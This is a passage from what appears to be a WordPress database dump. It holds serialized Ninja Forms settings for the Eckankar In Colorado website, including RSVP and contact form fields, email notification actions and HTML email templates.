Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:313:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to RSVP for this event. <br></span></p>\n\n</div>\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:225;}i:3;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-04-05 14:40:44\";s:5:\"label\";s:11:\"Admin Email\";s:19:\"email_message_plain\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:33:\"Eckankar In Colorado Contact Form\";s:12:\"from_address\";s:29:\"contact@eckankar-colorado.org\";s:2:\"to\";s:32:\"eck.events@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:13:\"email_message\";s:3089:\"<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><h1>Eckankar In Colorado</h1><br><br></td><td>&nbsp;</td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><p><strong>Hello! You have a new ECK Temple \'Beautify Day\' form submission.<br><br><br></strong><br><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><br><br><p>The following person has requested contact. Here is the information that <strong><span style=\"color: #333333\">{field:textbox_268}</span></strong> has submitted:</p><br><br></td></tr></tbody></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br><br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br><br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br><br><br> </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> </span><br><br><br> <br><br><br><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:if_you_have_a_message_please_enter_it_here_1649199448265}</span></p><br><br></td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br><p>&nbsp;</p>\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:226;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:40:\"ECK Temple \'Beautify Day\' - May 14, 2022\";s:10:\"created_at\";s:19:\"2022-04-05 14:40:44\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-03-03 03:15:50\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:2:\"36\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:9:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:56:\"if_you_have_a_message_please_enter_it_here_1649199448265\";i:6;s:8:\"html_305\";i:7;s:13:\"recaptcha_277\";i:8;s:10:\"submit_278\";}s:20:\"repeatable_fieldsets\";s:0:\"\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:14:\"deleted_fields\";a:1:{i:534;i:534;}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(60,'a:7:{s:2:\"id\";i:60;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:9:{i:0;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:9:\"show_desc\";s:1:\"0\";s:7:\"desc_el\";s:3:\"div\";s:13:\"default_value\";s:229:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:5:\"label\";s:4:\"Text\";s:6:\"def_id\";s:0:\"\";s:6:\"fav_id\";s:0:\"\";s:4:\"type\";s:4:\"html\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:8:\"desc_pos\";s:4:\"none\";s:7:\"default\";s:245:\"<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\n\nPlease Enter Your Information Below\";s:13:\"element_class\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:9:\"field_key\";s:8:\"html_267\";s:11:\"field_label\";s:4:\"Text\";s:3:\"key\";s:8:\"html_267\";}s:2:\"id\";i:599;}i:1;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:9:\"label_pos\";s:5:\"above\";s:5:\"label\";s:10:\"First Name\";s:6:\"def_id\";s:1:\"6\";s:6:\"fav_id\";s:0:\"\";s:4:\"type\";s:7:\"textbox\";s:21:\"custom_name_attribute\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:15:\"container_class\";s:15:\"one-third first\";s:7:\"default\";s:0:\"\";s:9:\"field_key\";s:11:\"textbox_268\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"last_name\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_268\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:600;}i:2;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_269\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_269\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:9:\"one-third\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:601;}i:3;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_270\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_270\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:9:\"one-third\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:602;}i:4;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:6:\"hr_273\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:6:\"hr_273\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:603;}i:5;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"6\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:15:\"Message Subject\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_303\";s:11:\"field_label\";s:15:\"Message Subject\";s:9:\"field_key\";s:11:\"textbox_303\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:604;}i:6;a:2:{s:8:\"settings\";a:35:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"7\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_276\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_276\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:605;}i:7;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"8\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:3:\"key\";s:8:\"html_305\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_305\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:606;}i:8;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"10\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_278\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_278\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:608;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-09-20 23:27:15\";s:5:\"label\";s:9:\"Save Form\";s:12:\"redirect_url\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:13:\"email_message\";s:14:\"{fields_table}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:16:\"payment_gateways\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:241;}i:1;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2022-09-20 23:27:15\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_270}\";s:13:\"email_subject\";s:38:\"Western Slope Leadership Communication\";s:13:\"email_message\";s:4984:\"<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";}s:2:\"id\";i:242;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-09-20 23:27:15\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front 